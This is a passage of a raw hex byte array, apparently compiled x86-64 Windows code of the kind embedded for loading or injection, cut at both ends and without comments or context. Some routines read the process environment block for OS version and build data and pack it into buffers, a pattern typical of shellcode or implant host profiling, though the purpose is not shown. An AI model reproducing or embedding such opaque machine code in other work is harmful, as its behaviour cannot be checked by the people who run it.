0xC8,0x49,0x89,0xC9,0x49,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0x41,0xFF,0xD2,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x49,0x01,0x00,0x00,0x48,0x8B,0x55,0x28,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0x48,0x8B,0x05,0xBA,0xCB,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xB2,0x00,0x00,0x00,0xC7,0x45,0xD4,0x01,0x00,0x00,0x00,0xC7,0x45,0x80,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xB0,0x48,0x89,0x45,0x88,0x8B,0x45,0xB8,0x89,0x45,0x90,0x48,0x8B,0x45,0x20,0x48,0x8D,0x4D,0xC4,0x48,0x8D,0x55,0x80,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xDC,0xF6,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x79,0x0C,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xE9,0xE9,0x00,0x00,0x00,0x8B,0x45,0xC4,0x85,0xC0,0x75,0x60,0x83,0x7D,0x30,0x00,0x74,0x5A,0xC7,0x45,0xA0,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xB0,0x48,0x89,0x45,0xA4,0xC7,0x45,0xAC,0x02,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xA0,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x10,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC5,0xEA,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x88,0x88,0x00,0x00,0x00,0xC7,0x45,0xC4,0x01,0x00,0x00,0x00,0x90,0xEB,0x7F,0x48,0x83,0x7D,0xE8,0x00,0x74,0x4D,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x3B,0x39,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCB,0x38,0x00,0x00,0x48,0x8B,0x05,0x3C,0xCA,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x34,0xCA,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x45,0xFC,0x01,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x39,0x45,0xFC,0x0F,0x82,0xF4,0xFD,0xFF,0xFF,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x49,0x48,0x83,0x7D,0xF0,0x00,0x74,0x42,0x8B,0x45,0xC0,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0x38,0x00,0x00,0x48,0x8B,0x05,0xC1,0xC9,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB9,0xC9,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x54,0x48,0x83,0x7D,0xE8,0x00,0x74,0x4D,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x65,0x38,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF5,0x37,0x00,0x00,0x48,0x8B,0x05,0x66,0xC9,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5E,0xC9,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0xE4,0x00,0x74,0x15,0x48,0x8B,0x45,0x20,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0x07,0xE8,0xFF,0xFF,0x8B,0x45,0xC4,0x48,0x81,0xC4,0xB8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x89,0xC2,0x8B,0x45,0x18,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0xF8,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x56,0x37,0x00,0x00,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0x8B,0x45,0x10,0x8B,0x50,0x10,0x8B,0x45,0x20,0x01,0xD0,0x89,0x45,0xFC,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x39,0x45,0xFC,0x73,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x47,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x18,0x48,0x39,0xC2,0x72,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x30,0x48,0x8B,0x45,0x10,0x8B,0x50,0x10,0x44,0x8B,0x45,0x20,0x48,0x8B,0x4D,0x18,0x48,0x8B,0x45,0x10,0x45,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x49,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x55,0xFC,0x89,0x50,0x10,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0x8B,0x45,0x10,0x8B,0x40,0x20,0x89,0x45,0xD0,0x48,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x24,0x66,0x89,0x45,0xD4,0x48,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x26,0x66,0x89,0x45,0xD6,0xC7,0x45,0xD8,0x03,0x00,0x00,0x00,0xC7,0x45,0xDC,0x20,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xD4,0x66,0x89,0x02,0x83,0x45,0xFC,0x02,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xD6,0x66,0x89,0x02,0x83,0x45,0xFC,0x02,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xD8,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x20,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x31,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0xD3,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x03,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x43,0x04,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x43,0x08,0x89,0x02,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x0C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA9,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x07,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF4,0x48,0x89,0x45,0xC0,0x8B,0x45,0xFC,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x29,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9F,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x04,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x89,0x45,0xC0,0x8B,0x45,0xF0,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xD9,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x52,0x48,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x09,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xDC,0x48,0x89,0x45,0xC0,0x8B,0x45,0xE4,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x8C,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x90,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0xC7,0x45,0xC8,0x60,0x00,0x00,0x00,0x8B,0x45,0xC8,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF8,0x48,0x05,0x1C,0x01,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x20,0x01,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xF8,0x48,0x05,0x24,0x01,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xF8,0x48,0x05,0xE8,0x02,0x00,0x00,0x48,0x89,0x45,0xD0,0x66,0xC7,0x45,0x90,0x09,0x00,0x66,0xC7,0x45,0x92,0x00,0x00,0x66,0xC7,0x45,0x94,0x00,0x00,0xC6,0x45,0x96,0x00,0xC6,0x45,0x97,0x01,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x89,0x45,0x98,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x89,0x45,0x9C,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x45,0xA0,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x89,0x45,0xA4,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xAC,0x00,0x00,0x66,0xC7,0x45,0xAE,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x50,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x58,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x90,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x92,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x94,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB6,0x45,0x96,0x88,0x02,0x83,0x45,0xCC,0x01,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB6,0x45,0x97,0x88,0x02,0x83,0x45,0xCC,0x01,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0x98,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0x9C,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA0,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA4,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xAC,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xAE,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x48,0x8B,0x45,0xB0,0x48,0x89,0x02,0x83,0x45,0xCC,0x08,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x48,0x8B,0x45,0xB8,0x48,0x89,0x02,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0x8B,0x4D,0x8C,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF7,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xD6,0x00,0x00,0x00,0x48,0x8D,0x55,0x8C,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x24,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x82,0xF9,0xFF,0xFF,0x48,0x8D,0x95,0x4C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x61,0xF9,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x89,0x85,0x48,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x48,0x8D,0x95,0x44,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x74,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x56,0x48,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC8,0x48,0x8B,0x45,0xD0,0x48,0x8B,0x50,0x08,0x48,0x8B,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x48,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2A,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8D,0x50,0x18,0x48,0x8D,0x8D,0x48,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xCF,0xF8,0xFF,0xFF,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x01,0x00,0x00,0x48,0x8D,0x05,0xB2,0x54,0x00,0x00,0x48,0x89,0x85,0xA0,0x00,0x00,0x00,0x48,0x8D,0x05,0xBA,0x54,0x00,0x00,0x48,0x89,0x85,0xA8,0x00,0x00,0x00,0x48,0x8D,0x05,0xC2,0x54,0x00,0x00,0x48,0x89,0x85,0xB0,0x00,0x00,0x00,0x48,0x8D,0x05,0xC8,0x54,0x00,0x00,0x48,0x89,0x85,0xB8,0x00,0x00,0x00,0x48,0x8D,0x05,0xD2,0x54,0x00,0x00,0x48,0x89,0x85,0xC0,0x00,0x00,0x00,0x48,0x8D,0x05,0xDE,0x54,0x00,0x00,0x48,0x89,0x85,0xC8,0x00,0x00,0x00,0x48,0x8D,0x05,0xE8,0x54,0x00,0x00,0x48,0x89,0x85,0xD0,0x00,0x00,0x00,0x48,0x8D,0x05,0xF4,0x54,0x00,0x00,0x48,0x89,0x85,0xD8,0x00,0x00,0x00,0x48,0x8D,0x05,0xFC,0x54,0x00,0x00,0x48,0x89,0x85,0xE0,0x00,0x00,0x00,0x48,0x8D,0x05,0x08,0x55,0x00,0x00,0x48,0x89,0x85,0xE8,0x00,0x00,0x00,0x48,0x8D,0x05,0x0E,0x55,0x00,0x00,0x48,0x89,0x85,0xF0,0x00,0x00,0x00,0x48,0x8D,0x05,0x16,0x55,0x00,0x00,0x48,0x89,0x85,0xF8,0x00,0x00,0x00,0x48,0x8D,0x05,0x1E,0x55,0x00,0x00,0x48,0x89,0x85,0x00,0x01,0x00,0x00,0x48,0x8D,0x05,0x26,0x55,0x00,0x00,0x48,0x89,0x85,0x08,0x01,0x00,0x00,0x48,0x8D,0x05,0x36,0x55,0x00,0x00,0x48,0x89,0x85,0x10,0x01,0x00,0x00,0x48,0x8D,0x05,0x42,0x55,0x00,0x00,0x48,0x89,0x85,0x18,0x01,0x00,0x00,0x48,0x8D,0x05,0x4C,0x55,0x00,0x00,0x48,0x89,0x85,0x20,0x01,0x00,0x00,0x48,0x8D,0x05,0x56,0x55,0x00,0x00,0x48,0x89,0x85,0x28,0x01,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x95,0xA0,0x00,0x00,0x00,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x12,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x13,0xD5,0xFF,0xFF,0x48,0x89,0x85,0x40,0x01,0x00,0x00,0x48,0x83,0xBD,0x40,0x01,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x05,0x06,0x00,0x00,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xF6,0x00,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x83,0xC0,0x01,0x89,0x85,0x9C,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x8B,0x50,0x10,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x89,0x90,0x14,0x02,0x00,0x00,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xC0,0x14,0xBA,0x00,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0x2C,0x00,0x00,0x89,0x45,0x18,0x8B,0x45,0x18,0x83,0xC0,0x01,0x89,0x45,0x18,0x8B,0x45,0x18,0x01,0xC0,0x89,0x45,0x18,0x48,0x8D,0x55,0x18,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2E,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE1,0x96,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x50,0x05,0x00,0x00,0x8B,0x4D,0x18,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8D,0x50,0x14,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xE1,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x94,0x96,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x03,0x05,0x00,0x00,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xBD,0x48,0x01,0x00,0x00,0x00,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x8B,0x40,0x10,0x89,0x85,0x98,0x00,0x00,0x00,0x48,0x8D,0x95,0x9C,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x69,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1C,0x96,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x8B,0x04,0x00,0x00,0x48,0xC7,0x45,0x20,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x70,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x78,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x7C,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x84,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0xE9,0x9C,0x03,0x00,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x48,0x89,0x45,0xA0,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x40,0x10,0x89,0x45,0xA8,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x1C,0x02,0x00,0x00,0x89,0x45,0xAC,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x18,0x02,0x00,0x00,0x89,0x45,0xB0,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x14,0x02,0x00,0x00,0x89,0x45,0xB4,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x